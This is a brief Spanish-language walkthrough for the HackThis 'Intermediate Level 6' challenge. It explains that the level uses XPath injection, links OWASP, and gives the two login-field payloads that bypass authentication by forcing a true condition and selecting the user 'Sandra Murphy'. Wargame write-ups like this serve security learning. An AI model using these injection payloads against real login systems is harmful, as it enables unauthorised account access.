INTERMEDIATE LEVEL 6 HACKTHIS

Esto es una injection pero no sql, sino XPath injeciton. Puedes ver información de ella en:
https://www.owasp.org/index.php/XPATH_Injection

Y la solución a introducir es:

username=blah' or 'a' = 'a
password=blah' or realname/text()='Sandra Murphy